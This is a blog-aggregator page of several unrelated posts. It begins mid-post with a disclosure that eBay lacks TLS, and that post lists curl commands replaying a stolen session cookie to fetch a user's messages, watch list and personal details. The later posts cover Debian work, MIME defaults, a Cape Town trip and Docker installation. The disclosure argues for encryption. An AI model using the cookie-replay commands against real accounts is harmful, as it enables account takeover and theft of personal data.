curl --cookie "$COOKIE" http://mesg.ebay.co.uk/mesgweb/ViewMessages/0 > messages.html
# Get the watch list
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/WatchList > watch.html

I’m sure you can use your imagination for more. One of my favourites is…

# Get the personal information
curl --cookie "$COOKIE" http://my.ebay.co.uk/ws/eBayISAPI.dll?MyeBay&CurrentPage=MyeBayPersonalInfo&gbh=1&ssPageName=STRK:ME:LNLK > personal.html

This one will give you the secret questions (but not the answers) and the last 4 digits of the registered card for a seller account. In the case of Mat Honan in 2012, the last 4 digits of his card number led to the loss of his Twitter account.

The techniques I’ve shown here do not seem to care where the request comes from. We tested using my cookie from Ana’s laptop and also tried from a server hosted in the US (our routing origin is in Germany so this should have perhaps been a red flag). I could not find any interface through which I could query my login history, I’m not sure what it would have shown.

I’m not a security researcher, though I do work as an Internet Engineering researcher. I’m publishing this as these vulnerabilities have already been disclosed in the paper I linked above and I believe this is something that needs attention. Every time I pointed out to someone that eBay does not use TLS over the last week they were suprised, and often horrified.

You might think that better validation of the source of the cookie might help, for instance, rejecting requests that suddenly come from other countries. As long as the attacker is on the path they have the ability to create flows that impersonate the host at the network layer. The only option here is to encrypt the flow and to ensure a means of authenticating the server, which is exactly what TLS provides.

You might think that such attacks may never occur, but active probes in response to passive measurements have been observed. I would think that having all these cookies floating around the Internet is really just an invitation for those cookies to be abused by some intelligence service (or criminal organisation). I would be very surprised if such ideas had not already been explored, if not implemented, on a large scale.

Please Internet, TLS already.

10 December, 2016 09:25PM

hackergotchi for Junichi Uekawa

Junichi Uekawa

Hello December.

Hello December. I was sick most of the time.

10 December, 2016 02:47AM by Junichi Uekawa

December 09, 2016

hackergotchi for Simon Richter

Simon Richter

Busy

I'm fairly busy at the moment, so I don't really have time to work on free software, and when I do I really want to do something else than sit in front of a computer.

I have declared email bankruptcy at 45,000 unread mails. I still have them, and plan to deal with them in small batches of a few hundred at a time, but in case you sent me something important, it is probably stuck in there. I now practice Inbox Zero, so resending it is a good way to reach me.

For my Debian packages, not much changes. Any package with more than ten users is team maintained anyway. Sponsoring for the packages where I agreed to do so goes on.

For KiCad, I won't get around to much of what I'd planned this year. Fortunately, at this point no one expects me to do anything soon. I still look into the CI system and unclog anything that doesn't clear on its own within a week.

Plans for December:

  • actually having my own place. While I like the room I'm staying at, it is still fairly expensive because it's paid by the day, and living out of a suitcase without access to my library is kind of annoying after some time.
  • finishing the paperwork for 2016. Except for some small bits, most of it is in place.
  • 33C3. This time, instead of the "two monitors, three computers" setup, my plan is to have a single laptop only, and have it closed most of the time so the battery lasts the whole day.
  • See how far I'll get with the controller board for the CNC mill in the Munich Maker Lab. Absolutely no pressure there, it's only the most complex and expensive PCB I ever made.

Plans for January:

  • Getting settled in.
  • Back to the Carbon Monoxide detector board that we started in early November. The board is simple enough.
  • Visiting a demoparty in Finland

Plans for February:

  • FOSDEM. I plan to hang out in the EDA devroom most of the time, and go to dinner with friends.
  • Party. Specifically, a housewarming party for whatever flat I'll have then.

Other than that, reading lots of books and meeting other people.

09 December, 2016 10:08PM

hackergotchi for Guido Günther

Guido Günther

Debian Fun in November 2016

Debian LTS

November marked the nineteenth month I contributed to Debian LTS under the Freexian umbrella. I had 7 hours allocated which I used completely by:

  • Being at LTS frontdesk twice (at the beginning and end of November) triaging about ~30 CVEs.
  • Preparing and releasing DLA-698-1 for QEMU fixing 9 CVEs
  • Putting out DLA-699-1 for xen, the acutal xen update was prepared by Bastian Blank

Other Debian stuff

  • Usual bunch of libvirt and related uploads (osinfo-db-tools, libvirt-python, libosinfo)
  • Sponsored svn2git upload
  • Uploaded git-buildpackage 0.8.7 to unstable (list of changes)

Some other Free Software activites

09 December, 2016 02:18PM

John Goerzen

Giant Concrete Arrows, Old Maps, and Fascinated Kids

Let me set a scene for you. Two children, ages 7 and 10, are jostling for position. There’s a little pushing and shoving to get the best view.

This is pretty typical for siblings this age. But what, you may wonder, are they trying to see? A TV? Video game?

No. Jacob and Oliver were in a library, trying to see a 98-year-old map of the property owners in Township 23, range 1 East, Harvey County, Kansas. And they were super excited about it, somewhat to the astonishment of the research librarian, who I am sure is more used to children jostling for position over the DVDs in the youth section than poring over maps in the non-circulating historical archives!

All this started with giant concrete arrows in the middle of nowhere.

Nearly a century ago, the US government installed a series of arrows on the ground in Kansas. These were part of a primitive air navigation system that led to the first transcontinental airmail service.

Every so often, people stumble upon these abandoned arrows and there is a big discussion online. Even Snopes has had to verify their authenticity (verdict: true). Entire websites exist to tracking and locating the remnants of these arrows. And as one of the early air mail routes went through Kansas, every so often people find these arrows around here.

I got the idea that it would be fun to replicate a journey along the old routes. Maybe I’d spot a few old arrows and such. So I started collecting old maps: a Contract Airmail Route #34 (CAM 34) map from 1927, aviation sectionals from 1933 and 1946, etc.

I noticed an odd thing on these maps: the Newton, KS airport was on the other side of the city from its present location, sometimes even several miles outside the city. What was going on?

1927 Airway Map
(1927 Airway Map)

1946 Wichita Sectional
(1946 Wichita sectional)

So one foggy morning, I explained my puzzlement to the boys. I highlighted all the mysteries: were these maps correct? Were there really two Newton airports at one time? How many airports were there, and where were they? Why did they move? What was the story behind them?

And I offered them the chance to be history detectives with me. And oh my goodness, were they ever excited! We had some information from a very helpful person at the Harvey County Historical Museum (thanks Kris!) So we suspected one airport at least was established in 1927. We also had a description of its location, though given in terms of township maps.

So the boys and I made the short drive over to the museum. We reviewed their property maps, though they were all a little older than the time period we needed. We looked through books and at pictures. Oliver pored over a railroad map of Newton from a century ago, fascinated. Jacob was excited to discover on one map that there used to be a train track down the middle of Main Street! I was interested that the present Newton Airport was once known as Wirt Field, rather to my surprise. I somehow suspect most 2nd and 4th graders spend a lot less excited time on their research floor!

Then on to the Newton Public Library to see if they’d have anything more — and that’s when the map that produced all the excitement came out.

It, by itself, didn’t answer the question, but by piecing together a number of pieces of information — newspaper stories, information from the museum, and the maps — we were able to come up with a pretty good explanation, much to their excitement.

Apparently, a man named Tangeman owned a golf course (the “golf links” according to the paper), and around 1927 the city of Newton purchased it, because of all the planes that were landing there. They turned it into a real airport. Later, they bought land east of the city and moved the airport there. However, during World War II, the Navy took over that location, so they built a third airport a few miles west of the city — but moved back to the current east location after the Navy returned that field to them.

Of course, a project like this just opens up all sorts of extra questions: why isn’t it called Wirt Field anymore? What’s the story of Frank Wirt? What led the Navy to take over Newton’s airport? Why did planes start landing on the golf course? Where precisely was the west airport located? How long was it there? (I found an aerial photo from 1956 that looks like it may have a plane in that general area, but it seems later than I’d have expected)

So now I have the boys interested in going to the courthouse with me to research the property records out there. Jacob is continually astounded that we are discovering things that aren’t in Wikipedia, and also excited that he could be the one to add them. To be continued, apparently!

09 December, 2016 03:04AM by John Goerzen

December 08, 2016

Stig Sandbeck Mathisen

MIME types and applications

On a Linux system with ‘desktop-file-utils’ installed, the default application for opening a file with a file manager, from a web browser, or using “xdg-open” on the command line is not static. The last installed or upgraded application becomes the default.

For example: After installing gimp, that application will be used to open any of the many types of files it supports. This lasts until another application which can open those mime types is installed or upgraded.

If I later install or upgrade “mupdf”, that application will be used for PDF, until, etcetera.

There are several bug reports filed for this confusing behaviour:

Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=525077

Ubuntu: https://bugs.launchpad.net/ubuntu/+source/gimp/+bug/574342

Firefox: https://bugzilla.mozilla.org/show_bug.cgi?id=727422

Components

/usr/bin/update-desktop-database

…is a command in the package ‘desktop-file-utils’

This command is run in the package postinst script, and triggers on writes to /usr/share/applications where .desktop files are written.

/usr/share/applications

This directory contains a list of applications (files ending with .desktop). These desktop files include mime types they are able to work with.

The ‘mupdf.desktop’ example shows it is able to work with (among other) application/pdf

[Desktop Entry]
Encoding=UTF-8
Name=MuPDF
GenericName=PDF file viewer
Comment=PDF file viewer
Exec=mupdf %f
TryExec=mupdf
Icon=mupdf
Terminal=false
Type=Application
MimeType=application/pdf;application/x-pdf;
Categories=Viewer;Graphics;
NoDisplay=true

[Desktop Action View]
Exec=mupdf %f

The gimp.desktop application entry shows it is more capable:

[Desktop Entry]
Version=1.0
Type=Application
Name=GNU Image Manipulation Program
# [...]
MimeType=image/bmp;image/g3fax;image/gif;image/x-fits;image/x-pcx;image/x-portable-anymap;image/x-portable-bitmap;image/x-portable-graymap;image/x-portable-pixmap;image/x-psd;image/x-sgi;image/x-tga;image/x-xbitmap;image/x-xwindowdump;image/x-xcf;image/x-compressed-xcf;image/x-gimp-gbr;image/x-gimp-pat;image/x-gimp-gih;image/tiff;image/jpeg;image/x-psp;application/postscript;image/png;image/x-icon;image/x-xpixmap;image/svg+xml;application/pdf;image/x-wmf;image/x-xcursor;

However, I’m quite sure I do not want ‘gimp’ to be the default viewer for all those file types.

/usr/share/applications/mimeinfo.cache

This is a list of MIME types, with a list of applications able to open them. The first entry in the list is the default application.

You may also have one of these in ~/.local/share/applications for applications installed in the user’s home directory.

Examples:

With ‘gimp.desktop’ first, “xdg-open test.pdf” will use gimp

[MIME Cache]
# [...]
application/pdf=gimp.desktop;mupdf.desktop;evince.desktop;libreoffice-draw.desktop;

After uninstalling and reinstalling mupdf, “mupdf.desktop” is first in the list, and “xdg-open test.pdf” will use mupdf

[MIME Cache]
# [...]
application/pdf=mupdf.desktop;gimp.desktop;evince.desktop;libreoffice-draw.desktop;

The order of .desktop files in mimeinfo.cache is the reverse of the order they are added to that directory.

The last installed utility is first in that list.

Application Trace

This was fun to dig into. I’ve just gotten some training which included a a better look at auditd. Auditd is a nice hammer, and this problem was a good nail.

I ran the command under “autrace”, and then looked for the order of reads from each run.

When “mupdf” is installed last, mupdf.desktop is read last, and placed first in the list of applications:

root@laptop:~# autrace /usr/bin/update-desktop-database
Waiting to execute: /usr/bin/update-desktop-database
Cleaning up...
Trace complete. You can locate the records with 'ausearch -i -p 13507'

root@laptop:~# ausearch -p 13507 | aureport --file | egrep 'gimp|mupdf'
389. 12/09/2016 17:35:37 /usr/share/applications/gimp.desktop 4 yes /usr/bin/update-desktop-database 1000 8002
390. 12/09/2016 17:35:37 /usr/share/applications/gimp.desktop 2 yes /usr/bin/update-desktop-database 1000 8003
391. 12/09/2016 17:35:37 /usr/share/applications/mupdf.desktop 4 yes /usr/bin/update-desktop-database 1000 8010
392. 12/09/2016 17:35:37 /usr/share/applications/mupdf.desktop 2 yes /usr/bin/update-desktop-database 1000 8011

root@laptop:~# grep application/pdf /usr/share/applications/mimeinfo.cache
application/pdf=mupdf.desktop;gimp.desktop;evince.desktop;libreoffice-draw.desktop;

Reinstalling “gimp” puts that first in the entry for application/pdf

root@laptop:~# apt install --reinstall gimp
[...]
Preparing to unpack .../gimp_2.8.18-1_amd64.deb ...
Unpacking gimp (2.8.18-1) over (2.8.18-1) ...
Processing triggers for mime-support (3.60) ...
Processing triggers for desktop-file-utils (0.23-1) ...
Setting up gimp (2.8.18-1) ...
Processing triggers for gnome-menus (3.13.3-8) ...
[...]

root@laptop:~# autrace /usr/bin/update-desktop-database
Waiting to execute: /usr/bin/update-desktop-database
Cleaning up...
Trace complete. You can locate the records with 'ausearch -i -p 15043'

root@laptop:~# ausearch -p 15043 | aureport --file | egrep 'gimp|mupdf'
389. 12/09/2016 17:39:53 /usr/share/applications/mupdf.desktop 4 yes /usr/bin/update-desktop-database 1000 9550
390. 12/09/2016 17:39:53 /usr/share/applications/mupdf.desktop 2 yes /usr/bin/update-desktop-database 1000 9551
391. 12/09/2016 17:39:53 /usr/share/applications/gimp.desktop 4 yes /usr/bin/update-desktop-database 1000 9556
392. 12/09/2016 17:39:53 /usr/share/applications/gimp.desktop 2 yes /usr/bin/update-desktop-database 1000 9557

root@laptop:~# grep application/pdf /usr/share/applications/mimeinfo.cache
application/pdf=gimp.desktop;mupdf.desktop;evince.desktop;libreoffice-draw.desktop;

Configuration

The solution to this is to add configuration so it will use something else than the default. The “xdg-mime” command is your tool.

The various desktop environments often do this for you. However, if you have a lightweight work environment, you may need to do this yourself for the MIME types you care about.

ssm@laptop ~ :) % xdg-mime query default application/pdf
gimp.desktop

ssm@laptop ~ :) % xdg-mime default mupdf.desktop application/pdf

ssm@laptop ~ :) % xdg-mime query default application/pdf
mupdf.desktop

This updates “~/.local/share/applications/mimeapps.list”, and you should now have set your preferred PDF reader.

08 December, 2016 11:00PM

hackergotchi for Alessio Treglia

Alessio Treglia

The new professionals of the interconnected world

interdisciplinary-learningThere is an empty chair at the conference table of business professionals, a not assigned place that increasingly demands for the presence of a new type of integration manager. The demands for an ever-increasing specialization, imposed by the modern world, are bringing out with great emphasis the need for an interdisciplinary professional who understands the demands of specialists and who is able to coordinate and to link actions and decisions. This need, often still ignored, is a direct result of the growing complexity of the modern world and the fast communications inside the network.

Complexity” is undoubtedly the most suitable paradigm to characterize the historical and social model of today’s world, in which the interactions and connections between the various areas now form an inextricable network of relations. Since the ’60s and’ 70s a large group of scholars – including the chemist Ilya Prigogine and the physicist Murray Gell-Mann – began to study what would become a true Science of Complexity.

Yet this is not an entirely new concept: the term means “composed of several parts connected to each other and dependent on each other“, exactly as reality, nature, society, and the environment around us. A “complex” mode of thought integrates and considers all contexts, interconnections, interrelationships between the different realities as part of the vision.

What is professionalism? And who are professionals? What can define a professional? <…>

<Read More…[by Fabio Marzocca]>

08 December, 2016 02:02PM by Fabio Marzocca

Vincent Fourmond

Finding zeros of data using QSoas

QSoas does not provide by default commands to detect zeros of data, and the reason for that is that it is simple, using the integrate command to convert this problem into a peak-finding problem, which can be solved using the find-peaks command. Here is that strategy applied to determining the zeros of the 0-th order bessel function:

QSoas> generate-buffer -10 10 bessel_j0(x) /samples=100001
QSoas> integrate
Current buffer now is: 'generated_int.dat'
QSoas> find-peaks
Found 6 peaks
buffer what x y index width left_width right_width
generated_int.dat min -8.6538 -0.201157042341714 6731 1.7798 0.905999999999999 0.873800000000001
generated_int.dat max -5.52 0.398165469321319 22400 2.2854 1.1862 1.0992
generated_int.dat min -2.4048 -0.403288737672291 37976 1.8232 0.973 0.850199999999999
generated_int.dat max 2.4048 2.53731134529594 62024 nan 2.2026 nan
generated_int.dat min 5.52 1.73585713830231 77600 nan 5.7198 nan
generated_int.dat max 8.6538 2.33517964996535 93269 nan 8.5532 nan

Compare that with the values given on Mathematica's website. This strategy is reasonably resistant to noise, since integration decreases high-frequency noise, but you may have to play with the /window option to find-peaks to avoid detecting the same zero (peak) several times.

Hopefully, I'll come back with more regular postings of tips and tricks !

08 December, 2016 08:57AM by Vincent Fourmond ([email protected])

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppAPT 0.0.3

A new version of RcppAPT -- our interface from R to the C++ library behind the awesome apt, apt-get, apt-cache, ... commands and their cache powering Debian, Ubuntu and the like -- is now on CRAN.

We changed the package to require C++11 compilation as newer Debian systems with g++-6 and the current libapt-pkg-dev library cannot build under the C++98 standard which CRAN imposes (and let's not get into why ...). Once set to C++11 we have no issues. We also added more examples to the manual pages, and turned on code coverage.

A bit more information about the package is available here as well as as the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

08 December, 2016 01:19AM

December 07, 2016

hackergotchi for Shirish Agarwal

Shirish Agarwal

Day trip in Cape Town, part 2

Debconf16 logo

The post continues from the last post shared.

Let me get some interesting tit-bits not related to the day-trip out-of-the-way first –

I don’t know whether we had full access to see all parts of fuller hall or not. Couple of days I was wondering around Fuller Hall, specifically next to where clothes were pressed. Came to know of the laundry service pretty late but still was useful. Umm… next to where the ladies/gentleman pressed our clothes, there is a stairway which goes down. In fact even on the opposite side there is a stairway which goes down. I dunno if other people explored them or not.

The jail inside and under UCT

I was surprised and shocked to see bars in each room as well as connecting walkways etc. I felt a bit sad, confused and curious and went on to find more places like that. After a while I came up to the ground-level and enquired with some of the ladies therein. I was shocked to know that UCT some years ago (they were not specific) was a jail for people. I couldn’t imagine that a place which has so much warmth (in people, not climate) could be ‘evil’ in a sense. I was not able to get much information out of them about the nature of jail it was, maybe it is a dark past that nobody wants to open up, dunno. There were also two *important* aspects of UCT which Bernelle either forgot, didn’t share or I just came to know via the Wikipedia page then but nothing else.

1. MeerKAT – Apparently quite a bit of the technology was built-in UCT itself. This would have been interesting for geeks and wanna-be geeks like me🙂

2. The OpenContent Initiative by UCT – This would have been also something worth exploring.

One more interesting thing which I saw was the French council in Cape Town from outside

The French Council in cape town from outside

I would urge to look at the picture in the gallery as the picture I shared doesn’t really show all the details. For e.g. the typical large french windows which are the hall-mark of French architecture doesn’t show its glory but if you look at 1306×2322 original picture instead of the 202×360 reproduction you will see that.

You will also the insignia of the French Imperial Eagle whose history I came to know only after I looked it up on the Wikipedia page on that day.

It seemed fascinating and probably would have the same pride as the State Emblem of India has for Indians with the four Asiatic Lions standing in a circle protecting each other.

I also like the palm tree and the way the French Council seemed little and yet had character around all the big buildings.

What also was interesting that there wasn’t any scare/fear-build and we could take photos from outside unlike what I had seen and experienced in Doha, Qatar as far as photography near Western Embassies/Councils were concerned.

One of the very eye-opening moments for me was also while I was researching flights from India to South Africa. While perhaps unconsciously I might have known that Middle East is close to India, in reality, it was only during the search I became aware that most places in Middle East by flight are only an hour or two away.

This was shocking as there is virtually no mention of one of our neighbours when they are source of large-scale remittances every year. I mean this should have been in our history and geography books but most do not dwell on the subject. It was only during and after that I could understand Mr. Modi’s interactions and trade policies with the Middle East.

Another interesting bit was seeing a bar in a Sprinbok bus –

spingbok atlas bar in bus

While admittedly it is not the best picture of the bar, I was surprised to find a bar at the back of a bus. By bar I mean a machine which can serve anything from juices to alcoholic drinks depending upon what is stocked. What was also interesting in the same bus is that the bus also had a middle entrance-and-exit.

The middle door in springbok atlas

This is something I hadn’t seen in most Indian buses. Some of the Volvo buses have but it is rarely used (only except emergencies) . An exhaustive showcase of local buses can be seen here . I find the hand-drawn/cad depictions of all the buses by Amit Pense near to the T.

Axe which can be used to break windows

Emergency exit window

This is also something which I have not observed in Indian inter-city buses (axe to break the window in case of accident and breakable glass which doesn’t hurt anyone I presume), whether they are State-Transport or the high-end Volvo’s . Either it’s part of South African Roads Regulations or something that Springbok buses do for their customers. All of these queries about the different facets I wanted to ask the bus-driver and the attendant/controller but in the excitement of seeing, recording new things couldn’t ask😦

In fact one of the more interesting things I looked at and could look day and night is the variety of vehicles on display in Cape Town. In hindsight, I should have bought a couple of 128 GB MMC cards for my mobile rather than the 64 GB one. It was just plain inadequate to capture all that was new and interesting.

Auditorum chair truck seen near Auditorium

This truck I had seen about some 100 metres near the Auditorium on Upper Campus. The truck’s design, paint was something I had never seen before. It is/was similar to casket trucks seen in movies but the way it was painted and everything made it special.

What was interesting is to see the gamut of different vehicles. For instance, there were no bicycles that I saw in most places. There were mostly Japanese/Italian bikes and all sorts of trucks. If I had known before, I would definitely have bought an SD specifically to take snaps of all the different types of trucks, cars etc. that I saw therein.

The adage/phrase ” I should stop in any one place and the whole world will pass me by ” seemed true on quite a few South African Roads. While the roads were on par or a shade better than India, many of those were wide roads. Seeing those, I was left imagining how the Autobahn in Germany and other high-speed Expressways would look n feel.

India has also been doing that with the Pune-Mumbai Expressway and projects like Yamuna Expressway and now the extension Agra Lucknow Expressway but doing this all over India would take probably a decade or more. We have been doing it since a decade and a half. NHDP and PMGSY are two projects which are still ongoing to better the roads. We have been having issues as to should we have toll or no toll issues but that is a discussion for some other time.

One of the more interesting sights I saw was the high-arched gothic-styled church from outside. This is near Longstreet as well.

high arch gothic-styled church

I have seen something similar in Goa, Pondicherry but not such high-arches. I did try couple of times to gain entry but one time it was closed, the other time some repairing/construction work was going on or something. I would loved to see it from inside and hopefully they would have had an organ (music) as well. I could imagine to some extent the sort of music that would have come out.

Now that Goa has come in the conversation I can’t help but state that Seafood enthusiasts/lover/aficionado, or/and Pescatarianism would have a ball of a time in Goa. Goa is on the Konkan coast and while I’m eggie, ones who enjoy seafood really have a ball of a time in Goa. Fouthama’s Festival which happens in February is particularly attractive as Goan homes are thrown open for people to come and sample their food, exchange recipes and alike. This happens around 2 weeks before the Goan Carnival and is very much a part of the mish-mashed Konkani-Bengali-Parsi-Portugese culture.

I better stop here about the Goa otherwise I’ll get into reminiscing mode.

To put the story and event back on track from where we left of (no fiction hereon), Nicholas was in constant communication with base, i.e. UCT as well as another group who was hiking from UCT to Table Mountain. We waited for the other group to join us till 13:00 hrs. We came to know that they were lost and were trying to come up and hence would take more time. As Bernelle was with them, who was a local and she had two dogs who knew the hills quite well, it was decided to go ahead without them.

We came down the same cable-car and then ventured on towards Houtbay. Houtbay has it all, a fisherman’s wharf, actual boats with tough-mean looking men with tattoos working on boats puffing cigars/pipes, gaggle of sea-gulls, the whole scene. Sharing a few pictures of the way in-between.

the view en-route to Houtbay

western style car paint and repair shop

Tajmahal Indian Restaurant, Houtbay

I just now had a quick look at the restaurant and it seems they had options for veggies too. Unfortunately, the rating leaves a bit to be desired but then dunno as Indian flavoring is something that takes time to get used too. Zomato doesn’t give any idea of from when a restaurant is in business and has too few reviews so not easy to know how the experience would have been.

Chinese noodles and small houses

Notice the pattern, the pattern of small houses I saw all the way till Houtbay and back. I do vaguely remember starting a discussion about it on the bus but don’t really remember. I have seen (on TV) cities like Miami, Dubai or/and Hong Kong who have big buildings on the beach but both in Konkan as well as Houtbay there were small buildings. I guess a combination of zoning regulations, feel of community, fear of being flooded all play into beaches being the way they are.

Also, this probably is good as less stress on the environment.

Miamiboyz from Wikimedia Commons

The above picture is taken from Wikipedia from the article Miami Beach, Florida for comparison.

Audi rare car to be seen in India

The Audi – rare car to be seen in India. This car has been associated with Ravi Shastri when he won it in 1985. I was young but still get goosebumps remembering those days.

first-glance-Houtbay-and-pier

First glance of Houtbay beach and pier. Notice how clean and white the beach is.

Wharf-Grill-Restaurant-from-side-and-Hop-on-Hop-off-bus

You can see the wharf grill restaurant in the distance (side-view), see the back of the hop on and hop off bus (a concept which was unknown to me till then). Once I came back and explored on the web came to know this concept is prevalent in many a touristy places around the world. Umm… also By sheer happenchance also captured a beautiful looking Indian female😉 .

So many things happening all at once

In Hindi, we would call this picture ‘virodabhas’ or ‘contradiction’. this is in afternoon, around 1430 hrs. You have the sun, the clouds, the Mountains, the x number of boats, the pier, the houses, the cars, the shops. It was all crazy and beautiful at the same time.

The Biggest Contradiction is seeing the Mountain, the beach and the Sea in the same Picture. Baffled the mind. Konkan though is a bit similar there as well. You have all the three things in some places but that’s a different experience altogether as ours is a more tropical weather although is one of the most romantic places in the rains.

We were supposed to go on a short cruise to seal/dolphin island but as we were late (as had been waiting for the other group) didn’t go and instead just loitered there.

Fake-real lookout bar-restaurant

IIRC the lookout bar is situated just next to Houtbay Search and Rescue. Although was curious if the Lookout tower was used in case of disappearance. lost people, boats etc.

Seal in action

Seal jumping over water, what a miracle !

One of the boats on which we possibly could have been on.

It looked like the boat we could have been on. I clicked as I especially liked the name Calypso and Calypso . I shared the two links as the mythologies, interpretation differ a bit between Greek and Hollywood culture🙂

Debian folks and the area around

Can see few Debian folks in the foreground, next to the Pole and the area around. Also can see a bit of the area around.

Alone boy trying to surf

I don’t know anything about water sports and after sometime he came out. I was left wondering though, how safe he was in that water. While he was close to the pier and he was just paddling, there weren’t big waves still felt a bit of concern.

Mr. Seal - the actor and his handler

While the act was not to the level we see in the movies, still for the time I hung around, I saw him showing attitude for his younger audiences, eating out of their hands, making funny sounds. Btw he farted a few times, whether that was a put-on or not can’t really say but produced a few guffaws from his audience.

A family feeding Mr. Seal

I dunno why the birds came down for. Mr. Seal was being fed oily small fish parts, dunno if the oil was secreted by the fish themselves or whatever, it just looked oily from distance.

Bird-Man-Bird

Bird taking necessary sun bath

typical equipment on a boat to catch fish-lot of nets

boats-nets-and-ropes

People working on disentangling a net

There wasn’t much activity on the time we went. It probably would have been different on sunrise and would be on sunset. The only activity I saw was on this boat where they were busy fixing and disentangling the lines. I came up with 5-15 different ideas for a story but rejected them as –

a. Probably all of them have been tried. People have been fishing since the beginning of time and modern fishing probably 200 odd years or so. I have read accounts of fishing companies in early 1800s onwards, so probably all must have been tried.

b. More dangerous one, if there is a unique idea, then it becomes more dangerous as writing is an all-consuming process. Writing a blog post (bad or good) takes lots of time. I constantly read, re-read, try and improvise till I can or my patience loses out. In book you simply can’t have such luxuries.

hout-bay-search-and-rescue-no-parking-zone

No parking/tow zone in/near the Houtbay search and rescue. Probably to take out emergency vehicles once something untoward happens.

hout-bay-sea-rescue-with-stats

Saved 54 lives, boats towed 154 – Salut! Houtbay sea rescue.

The different springbok atlas bus that we were on

kraal-kraft

The only small criticism is for Houtbay – there wasn’t a single public toilet. We had to ask favor at kraal kraft to use their toilets and there could have been accidents, it wasn’t lighted well and water was spilled around.

Road sign telling that we are near to UCT

For us, because we were late we missed both the boat-cruise as well as some street shops selling trinkets. Other than that it was all well. We should have stayed till sunset, I am sure the view would have been breath-taking but we hadn’t booked the bus till evening.

Back at UCT

Overall it was an interesting day as we had explored part of Table Mountain, seen the somewhat outrageously priced trinkets there as well as explored Houtbay sea-side as well.


Filed under: Miscellenous Tagged: #Audi, #Cape Town, #Cruises, #Debconf16, #French Council, #Geography, #Houtbay Sea Rescue, #Jail, #Middle East, #Springbok Atlas, #Vehicles

07 December, 2016 09:10PM by shirishag75

Tianon Gravi

My Docker Install Process

I’ve had several requests recently for information about how I personally set up a new machine for running Docker (especially since I don’t use the infamous curl get.docker.com | sh), so I figured I’d outline the steps I usually take.

For the purposes of simplicity, I’m going to assume Debian (specifically stretch, the upcoming Debian stable release), but these should generally be easily adjustable to jessie or Ubuntu.

These steps should be fairly similar to what’s found in upstream’s “Install Docker on Debian” document, but do differ slightly in a few minor ways.

grab Docker’s APT repo GPG key

The way I do this is probably a bit unconventional, but the basic gist is something like this:

export GNUPGHOME="$(mktemp -d)"
gpg --keyserver ha.pool.sks-keyservers.net --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
gpg --export --armor 58118E89F3A912897C070ADBF76221572C52609D | sudo tee /etc/apt/trusted.gpg.d/docker.gpg.asc
rm -rf "$GNUPGHOME"

(On jessie or another release whose APT doesn’t support .asc files in /etc/apt/trusted.gpg.d, I’d drop --armor and the .asc and go with simply /.../docker.gpg.)

This creates me a new GnuPG directory to work with (so my personal ~/.gnupg doesn’t get cluttered with this new key), downloads Docker’s signing key from the keyserver gossip network (verifying the fetched key via the full fingerprint I’ve provided), exports the key into APT’s keystore, then cleans up the leftovers.

For completeness, other popular ways to fetch this include:

sudo apt-key adv --keyserver ha.pool.sks-keyservers.net --recv-keys 58118E89F3A912897C070ADBF76221572C52609D

(worth noting that man apt-key discourages the use of apt-key adv)

wget -qO- 'https://apt.dockerproject.org/gpg' | sudo apt-key add -

(no verification of the downloaded key)

Here’s the relevant output of apt-key list on a machine where I’ve got this key added in the way I outlined above:

$ apt-key list
...

/etc/apt/trusted.gpg.d/docker.gpg.asc
-------------------------------------
pub   rsa4096 2015-07-14 [SCEA]
      5811 8E89 F3A9 1289 7C07  0ADB F762 2157 2C52 609D
uid           [ unknown] Docker Release Tool (releasedocker) <[email protected]>

...

add Docker’s APT source

If you prefer to fetch sources via HTTPS, install apt-transport-https, but I’m personally fine with simply doing GPG verification of fetched packages, so I forgo that in favor of less packages installed. YMMV.

echo 'deb http://apt.dockerproject.org/repo debian-stretch main' | sudo tee /etc/apt/sources.list.d/docker.list

Hopefully it’s obvious, but debian-stretch in that line should be replaced by debian-jessie, ubuntu-xenial, etc. as desired. It’s also worth pointing out that this will not include Docker’s release candidates. If you want those as well, add testing after main, ie ... debian-stretch main testing' | ....

At this point, you should be safe to run apt-get update to verify the changes:

$ sudo apt-get update
...
Hit:1 http://apt.dockerproject.org/repo debian-stretch InRelease
...
Reading package lists... Done

(There shouldn’t be any warnings or errors about missing keys, etc.)

configure Docker

This step could be done after Docker’s installed (and indeed, that’s usually when I do it because I forget that I should until I’ve got Docker installed and realize that my configuration is suboptimal), but doing it before ensures that Docker doesn’t have to be restarted later.

sudo mkdir -p /etc/docker
sudo sensible-editor /etc/docker/daemon.json

(sensible-editor can be replaced by whatever editor you prefer, but that command should choose or prompt for a reasonable default)

I then fill daemon.json with at least a default storage-driver. Whether I use aufs or overlay2 depends on my kernel version and available modules – if I’m on Ubuntu, AUFS is still a no-brainer (since it’s included in the default kernel if the linux-image-extra-XXX/linux-image-extra-virtual package is installed), but on Debian AUFS is only available in either 3.x kernels (jessie’s default non-backports kernel) or recently in the aufs-dkms package (as of this writing, still only available on stretch and sid – no jessie-backports option).

If my kernel is 4.x+, I’m likely going to choose overlay2 (or if that errors out, the older overlay driver).

Choosing an appropriate storage driver is a fairly complex topic, and I’d recommend that for serious production deployments, more research on pros and cons is performed than I’m including here (especially since AUFS and OverlayFS are not the only options – they’re just the two I personally use most often).

{
	"storage-driver": "overlay2"
}

configure boot parameters

I usually set a few boot parameters as well (in /etc/default/grub’s GRUB_CMDLINE_LINUX_DEFAULT option – run sudo update-grub after adding these, space-separated).

  • cgroup_enable=memory – enable “memory accounting” for containers (allows docker run --memory for setting hard memory limits on containers)
  • swapaccount=1 – enable “swap accounting” for containers (allows docker run --memory-swap for setting hard swap memory limits on containers)
  • systemd.legacy_systemd_cgroup_controller=yes – newer versions of systemd may disable the legacy cgroup interfaces Docker currently uses; this instructs systemd to keep those enabled (for more details, see systemd/systemd#4628, opencontainers/runc#1175, docker/docker#28109)
  • vsyscall=emulate – allow older binaries to run (debian:wheezy, etc.; see docker/docker#28705)

All together:

...
GRUB_CMDLINE_LINUX_DEFAULT="cgroup_enable=memory swapaccount=1 systemd.legacy_systemd_cgroup_controller=yes vsyscall=emulate"
...

install Docker!

Finally, the time has come.

$ sudo apt-get install -V docker-engine
...

$ sudo docker version
Client:
 Version:      1.12.3
 API version:  1.24
 Go version:   go1.6.3
 Git commit:   6b644ec
 Built:        Wed Oct 26 21:45:16 2016
